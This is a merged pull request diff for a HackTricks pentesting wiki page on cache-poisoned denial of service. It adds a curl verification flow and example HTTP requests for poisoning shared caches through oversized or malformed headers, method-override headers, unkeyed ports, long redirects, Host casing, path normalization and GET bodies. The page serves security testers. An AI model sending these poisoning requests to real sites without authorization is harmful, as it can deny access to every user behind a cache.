Merge pull request #2240 from HackTricks-wiki/research_update_src_pentesting-web_cache-deception_cache-poisoning-to-dos_20260515_035758

Research Update Enhanced src/pentesting-web/cache-deception/...

Author: carlospolop

src/pentesting-web/cache-deception/cache-poisoning-to-dos.md

@@ -3,146 +3,178 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!CAUTION]
-> In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
+> These techniques try to make the **origin return an error, a blank body, or a broken redirect** for a request that the **cache still considers valid/cacheable**. Once stored, the poisoned object can deny access to every user hitting the same cache key.
 
-- **HTTP Header Oversize (HHO)**
+> [!TIP]
+> Confirm CPDoS with the **lowest blast radius possible**: send a **baseline** request, then the **poisoning** request, and finally a **validation** request without the malicious input. Compare **status**, **body length**, and cache headers such as **`X-Cache`**, **`CF-Cache-Status`**, **`Cache-Status`**, or **`Age`**. If possible, use a sacrificial endpoint or an unkeyed cache buster first.
 
-Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
+If the issue depends on **path confusion**, **static extensions/directories**, or other URL parser discrepancies, first check [Cache Poisoning via URL discrepancies](cache-poisoning-via-url-discrepancies.md).
 
-```
-GET / HTTP/1.1
-Host: redacted.com
-X-Oversize-Hedear:Big-Value-000000000000000
-```
+## Quick verification flow
 
-- **HTTP Meta Character (HMC) & Unexpected values**
+```bash
+url='https://target.tld/app.js'
 
-Send a header that contain some **harmfull meta characters** such as and . In order the attack to work you must bypass the cache first.
+# 1) Baseline
+curl -isk "$url" | egrep -i '^(HTTP/|x-cache:|cf-cache-status:|cache-status:|age:|content-length:)'
 
+# 2) Poison attempt
+curl -isk -H 'X-HTTP-Method-Override: HEAD' "$url" | egrep -i '^(HTTP/|x-cache:|cf-cache-status:|cache-status:|age:|content-length:)'
+
+# 3) Validation
+curl -isk "$url" | egrep -i '^(HTTP/|x-cache:|cf-cache-status:|cache-status:|age:|content-length:)'
 ```
+
+## Common cache poisoning-to-DoS primitives
+
+### HTTP Header Oversize (HHO)
+
+Send a request with a header block that is **accepted by the cache** but **rejected by the origin**. If the resulting 4xx page is cached, later normal requests will get the cached error.
+
+```http
 GET / HTTP/1.1
 Host: redacted.com
-X-Meta-Hedear:Bad Chars\n \r
+X-Oversized-Header: Big-Value-00000000000000000000000000000000000000000000000000
 ```
 
-A badly configured header could be just `\:` as a header.
+This is especially interesting when the **CDN/header limit is larger than the origin/framework limit**.
+
+### HTTP Meta Character (HMC) & unexpected values
 
-This could also work if unexpected values are sent, like an unexpected Content-Type:
+Send **control/meta characters** such as **`\0`**, **`\b`**, **`\r`**, or **`\n`**, or malformed values that the cache forwards but the origin refuses. Some origins also error on syntactically valid-but-unexpected values such as a bogus `Content-Type`.
 
+```http
+GET / HTTP/1.1
+Host: redacted.com
+X-Metachar-Header: \0
 ```
+
+```http
 GET /anas/repos HTTP/2
 Host: redacted.com
 Content-Type: HelloWorld
 ```
 
-- **Unkeyed header**
+A badly configured parser may also fail on values such as `\:`.
 
-Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
+### Unkeyed header that triggers an error
 
-```
+Some backends return an error or denial page when they see specific headers, but the cache key doesn't vary on that header.
+
+```http
 GET /app.js HTTP/2
 Host: redacted.com
 X-Amz-Website-Location-Redirect: someThing
 
 HTTP/2 403 Forbidden
-Cache: hit
+X-Cache: hit
 
 Invalid Header
 ```
 
-- **HTTP Method Override Attack (HMO)**
+Also test `Forwarded`, `X-Forwarded-Host`, `X-Forwarded-Port`, and application-specific routing headers when they influence redirects or origin routing.
 
-If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
+### HTTP Method Override Attack (HMO)
 
-```
-GET /blogs HTTP/1.1
+If the application or middleware supports method override headers such as `X-HTTP-Method-Override`, `X-HTTP-Method`, or `X-Method-Override`, you may be able to transform a normal `GET` into an unsupported or body-less method at the origin while the cache still stores the response under the `GET` key.
+
+```http
+GET /app.js HTTP/1.1
 Host: redacted.com
-HTTP-Method-Override: POST
+X-HTTP-Method-Override: HEAD
 ```
 
-- **Unkeyed Port**
+`HEAD`, `TRACE`, `PUT`, `DELETE`, and `POST` are worth testing. `HEAD` is especially attractive because some stacks reply `200 OK` with `Content-Length: 0`, effectively blanking the asset for everyone.
 
-If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
+### Unkeyed Port
 
-```
+If the port in the `Host` header is reflected in the response but excluded from the cache key, it may be possible to poison a redirect to an unused port:
+
+```http
 GET /index.html HTTP/1.1
 Host: redacted.com:1
 
 HTTP/1.1 301 Moved Permanently
 Location: https://redacted.com:1/en/index.html
-Cache: miss
+X-Cache: miss
 ```
 
-- **Long Redirect DoS**
+### Long Redirect DoS
 
-Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
+If an unkeyed parameter is copied into a redirect target, you may be able to make the cache store a redirect that later resolves into `414 URI Too Large`, `431 Request Header Fields Too Large`, or another error on the follow-up request.
 
-```
+```http
 GET /login?x=veryLongUrl HTTP/1.1
 Host: www.cloudflare.com
 
 HTTP/1.1 301 Moved Permanently
 Location: /login/?x=veryLongUrl
-Cache: hit
+CF-Cache-Status: HIT
 
 GET /login/?x=veryLongUrl HTTP/1.1
 Host: www.cloudflare.com
 
 HTTP/1.1 414 Request-URI Too Large
-CF-Cache-Status: miss
+CF-Cache-Status: MISS
 ```
 
-- **Host header case normalization**
+### Host header case normalization
 
-The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
+The `Host` header is case-insensitive, but some origins or routing layers still behave differently depending on casing. If the cache normalizes the host for the key while the origin uses the raw value, a mixed-case `Host` can poison the canonical cache bucket:
 
-```
+```http
 GET /img.png HTTP/1.1
 Host: Cdn.redacted.com
 
 HTTP/1.1 404 Not Found
-Cache:miss
+X-Cache: miss
 
 Not Found
 ```
 
-- **Path normalization**
+### Path normalization / static-rule confusion
 
-Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
+Some caches normalize or classify the path differently from the origin. A path that looks cacheable to the front-end (`/assets/...`, `.css`, `.js`, dot-segments, encoded dots, delimiters) may map to a dynamic route on the origin that returns an error or blank response. If the static-looking key is cached, the dynamic endpoint becomes unavailable through that cache key.
 
-```
+```http
 GET /api/v1%2e1/user HTTP/1.1
 Host: redacted.com
 
-
 HTTP/1.1 404 Not Found
-Cach:miss
+X-Cache: miss
 
 Not Found
 ```
 
-- **Fat Get**
+For delimiter/static-extension/static-directory tricks, see [Cache Poisoning via URL discrepancies](cache-poisoning-via-url-discrepancies.md).
 
-Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this could be abused to cache a invalid response:
+### Fat GET
 
-```
+Some caches/origins reject **`GET` with a body**, or the origin reads parameters from the body while the cache keys only on the URL. This can poison an error or unexpected response under the clean `GET` cache key.
+
+```http
 GET /index.html HTTP/2
 Host: redacted.com
 Content-Length: 3
 
 xyz
 
-
 HTTP/2 403 Forbidden
-Cache: hit
+X-Cache: hit
 ```
 
-## References
+### Framework / internal cache poisoning
 
-- [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
-- [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------)
+Recent framework bugs showed that **CPDoS is not limited to classic 4xx/5xx cache poisoning at the CDN layer**. Internal framework caches or upstream CDNs may also store:
 
-{{#include ../../banners/hacktricks-training.md}}
+- a **`204 No Content`** response for a normally populated static/ISR page
+- a **`200 OK`** response with **`Content-Length: 0`**
+- a response that was supposed to stay **`private, no-store`** but is coerced into **`s-maxage`** / **`stale-while-revalidate`**
 
+In practice, this means a single crafted request can blank an HTML page or JS asset without needing a traditional error page. When testing modern frameworks, compare the same endpoint with and without framework-specific cache/data headers and watch for changes in **`Cache-Control`**, **body length**, and shared-cache headers. If you are assessing a Next.js target, also check [the Next.js page](../../network-services-pentesting/pentesting-web/nextjs.md) for framework-specific cache poisoning bugs.
 
+## References
 
+- [Responsible denial of service with web cache poisoning](https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning)
+- [Next.JS vulnerability can lead to DoS via cache poisoning](https://github.com/advisories/GHSA-67rr-84xm-4c7r)
+{{#include ../../banners/hacktricks-training.md}}